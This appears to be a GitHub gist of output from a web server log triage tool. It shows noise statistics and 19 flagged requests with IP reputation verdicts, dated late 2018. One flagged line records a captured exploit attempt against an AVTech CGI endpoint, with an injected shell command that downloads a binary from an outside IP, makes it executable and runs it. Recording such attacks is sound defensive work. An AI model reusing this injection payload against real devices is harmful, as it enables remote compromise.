Skip to content

Instantly share code, notes, and snippets.

@9b 9b/log-review.txt
Last active Nov 8, 2018

Embed
What would you like to do?
{
'statistics': {
'noise': 264,
'ips_processed': 283,
'duplicate_entries': 4609,
'money_saved': '$179.17',
'duplicate_ratio': 94.0,
'noise_ratio': 93.0,
'time_saved': '8:48:00',
'interest': 19,
'lines_processed': 4892
},
'flagged': [{
'code': '0x08',
'ip': '43.251.16.253',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '43.251.16.253 - - [28/Oct/2018:21:41:09 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}, {
'code': '0x00',
'ip': '151.52.18.121',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.18.121 - - [29/Oct/2018:16:52:04 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '93.229.192.199',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '93.229.192.199 - - [30/Oct/2018:06:48:35 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin HTTP/1.1" 400 0 "-" "Sefa"\n'
}, {
'code': '0x08',
'ip': '41.73.228.160',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '41.73.228.160 - - [30/Oct/2018:11:46:38 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
}, {
'code': '0x00',
'ip': '201.253.109.30',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '201.253.109.30 - - [31/Oct/2018:07:28:22 +0000] "GET /wp-login.php HTTP/1.1" 302 580 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"\n'
}, {
'code': '0x00',
'ip': '138.197.15.168',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '138.197.15.168 - - [31/Oct/2018:15:16:53 +0000] "HEAD / HTTP/1.1" 302 197 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"\n'
}, {
'code': '0x00',
'ip': '188.158.110.52',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '188.158.110.52 - - [31/Oct/2018:20:02:05 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
}, {
'code': '0x00',
'ip': '84.188.73.252',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '84.188.73.252 - - [31/Oct/2018:21:28:02 +0000] "HEAD http://54.70.60.202:80/phpmyadmin/ HTTP/1.1" 302 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '125.160.45.188',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '125.160.45.188 - - [31/Oct/2018:23:06:52 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '151.52.19.187',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.19.187 - - [31/Oct/2018:23:32:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '54.36.150.76',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '54.36.150.76 - - [01/Nov/2018:05:53:16 +0000] "GET /robots.txt HTTP/1.1" 404 2596 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
}, {
'code': '0x00',
'ip': '54.36.150.167',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '54.36.150.167 - - [01/Nov/2018:05:53:16 +0000] "GET / HTTP/1.1" 200 7775 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
}, {
'code': '0x00',
'ip': '82.58.159.157',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '82.58.159.157 - - [02/Nov/2018:03:40:07 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '151.52.31.246',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.31.246 - - [02/Nov/2018:11:43:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '73.27.15.168',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '73.27.15.168 - - [03/Nov/2018:19:00:23 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
}, {
'code': '0x08',
'ip': '202.182.133.2',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '202.182.133.2 - - [03/Nov/2018:23:25:08 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '123.207.171.250',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '123.207.171.250 - - [04/Nov/2018:02:48:42 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}, {
'code': '0x00',
'ip': '77.234.68.136',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '77.234.68.136 - - [04/Nov/2018:21:56:50 +0000] "GET / HTTP/1.1" 302 556 "https://brandnewblogs.com/blogs-july-2018/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"\n'
}, {
'code': '0x00',
'ip': '117.50.73.19',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '117.50.73.19 - - [04/Nov/2018:22:01:51 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.